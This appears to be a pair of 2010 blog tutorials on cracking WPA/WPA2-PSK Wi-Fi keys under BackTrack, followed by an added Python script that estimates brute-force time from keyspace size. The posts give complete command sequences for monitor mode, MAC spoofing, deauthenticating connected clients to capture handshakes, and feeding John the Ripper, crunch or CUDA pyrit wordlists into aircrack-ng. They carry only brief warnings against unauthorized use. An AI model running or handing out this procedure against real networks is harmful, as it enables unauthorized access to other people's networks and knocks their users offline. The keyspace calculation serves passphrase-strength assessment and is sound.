Friday, April 16, 2010

HOWTO : Crack WPA/WPA2-PSK with John the Ripper

At the moment, we need to use dictionaries to brute force WPA/WPA2-PSK, so cracking WPA/WPA2-PSK requires that the key to be cracked is in your dictionaries. I have a better solution to crack WPA/WPA2-PSK (in theory, it must succeed), but it requires hours to years to crack, depending on the strength of the key and the speed of the hardware.

The following tutorial is based on Back|Track 4. Suppose the wifi channel is 5, the BSSID MAC is 00:24:B2:A0:51:14 and the client MAC is 00:14:17:94:90:0D. Make sure the client is connected to the wifi router when you are performing Step 1 to 4.

Step 1 : airmon-ng start wlan0

Step 2 : airodump-ng mon0

Step 3 : airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0

Step 4 : aireplay-ng --deauth 10 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0

Once you get the handshake, go to the next step. If not, do it again until you get the handshake.

Step 5 : /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:24:B2:A0:51:14 -w - output*.cap

You are required to wait for hours or years for the cracking, which depends on how powerful your hardware is and how strong the key is. CUDA makes the work easier, but it may still take years, depending on the key.

WARNING : Do NOT crack any wifi router without authorization or you will be put into jail.

Step 6 : Press "Ctrl+c" to break the program.


HOWTO : WPA/WPA2 cracking with Back|Track 5

Don't crack any wifi router without authorization, otherwise you will be put into the jail.

(A) General Display card

Step 1 : airmon-ng

The result will be something like :

Interface wlan0 Chipset Intel 5100 Driver iwlagn [phy0]

Step 2 : airmon-ng start wlan0

Step 3 (Optional) : Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step 4 : airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step 5 : airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel, -w is the file to be written, --bssid is the BSSID

This terminal keeps running.

Step 6 : Open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID, -c is the client MAC address (STATION)

Wait for the handshake.

Step 7 : Use John the Ripper as the word list to crack the WPA/WPA2 password.

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) : If you do not want to use John the Ripper as the word list, you can use Crunch.

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunchwordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

(B) nVidia Display Card with CUDA

If you have an nVidia card with CUDA, you can use pyrit to crack the password with crunch.

Step a : airmon-ng

The result will be something like :

Interface wlan0 Chipset Intel 5100 Driver iwlagn [phy0]

Step b : airmon-ng start wlan0

Step c (Optional) : Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step d : airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step e : airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

Step f : Open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID, -c is the client MAC address (STATION)

Wait for the handshake.

Step g : If the following programs are not yet installed, please install them.

apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h : Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunchwordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

Step i : Go to the official site of pyrit.
http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install

Step j : /pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step k (Optional) : If you encounter an error when reading wpacrack-01.cap, you should do the following step.

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step l : Then, you will see something similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)... Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far, 17504 PMKs per second.

Remarks :

If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.

To test if your wireless card (either USB or PCI-e) can do the injection or not :

airodump-ng mon0

Open another terminal.

aireplay-ng -9 mon0

Make sure pyrit works on your system :

pyrit list_cores

That's all! See you.

Posted by Samiux at 08:57
Labels: Back|Track, crunch, CUDA, John the Ripper, pyrit, WPA, WPA2
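Both posts say the search takes "hours to years" depending on key strength, and the second post's Remarks quote about 17,504 PMKs per second. The following is an added example (not code from the original posts) that puts numbers on that claim: it sizes the crunch "8 16" keyspace and converts it to time at the quoted rate, which is the calculation a network owner should do when choosing a passphrase. The charset size 95 for mixalpha-numeric-all-space-sv is an assumption (the plain mixalpha-numeric-all-space set is 95 printable ASCII characters; the Swedish variant adds letters, so the true keyspace is at least this large).

```python
# Added example, not part of the original posts. Estimates how long an
# exhaustive search of a crunch keyspace would take at the PMK rate the
# post quotes for a GTX460 (17,504 PMKs/s). Charset size is an assumption.

ASSUMED_CHARSET_SIZE = 95   # assumption: printable ASCII; "-sv" only adds letters
PMK_PER_SECOND = 17504      # rate shown in the post's pyrit output
SECONDS_PER_YEAR = 365.25 * 24 * 3600


def keyspace_size(charset_size: int, min_len: int, max_len: int) -> int:
    """Number of candidate passphrases of every length in [min_len, max_len],
    i.e. what `crunch min_len max_len` would emit for this charset."""
    if charset_size < 1 or min_len < 1 or max_len < min_len:
        raise ValueError("bad charset size or length range")
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


def years_to_exhaust(candidates: int, rate: float = PMK_PER_SECOND) -> float:
    """Worst-case wall-clock time to try every candidate at `rate` PMKs/s."""
    return candidates / rate / SECONDS_PER_YEAR


def expected_years(candidates: int, rate: float = PMK_PER_SECOND) -> float:
    """On average a uniformly chosen key is hit halfway through the keyspace."""
    return years_to_exhaust(candidates, rate) / 2


def report(charset_size: int, min_len: int, max_len: int,
           rate: float = PMK_PER_SECOND) -> dict:
    ks = keyspace_size(charset_size, min_len, max_len)
    return {"candidates": ks,
            "worst_case_years": years_to_exhaust(ks, rate),
            "expected_years": expected_years(ks, rate)}


if __name__ == "__main__":
    cases = [
        ("8 chars, lowercase only", 26, 8, 8),
        ("8 chars, mixalpha-numeric-all-space", ASSUMED_CHARSET_SIZE, 8, 8),
        ("crunch 8 16 mixalpha-numeric-all-space", ASSUMED_CHARSET_SIZE, 8, 16),
    ]
    for label, cs, lo, hi in cases:
        r = report(cs, lo, hi)
        print(f"{label}: {r['candidates']:.3e} candidates, "
              f"worst case {r['worst_case_years']:.3e} years, "
              f"expected {r['expected_years']:.3e} years")
```

The first case (an 8-character lowercase key) falls in months at the quoted rate; the full 8-to-16 mixed keyspace is beyond any realistic budget, which is why the posts' "hours to years" hinges entirely on passphrase length and character mix.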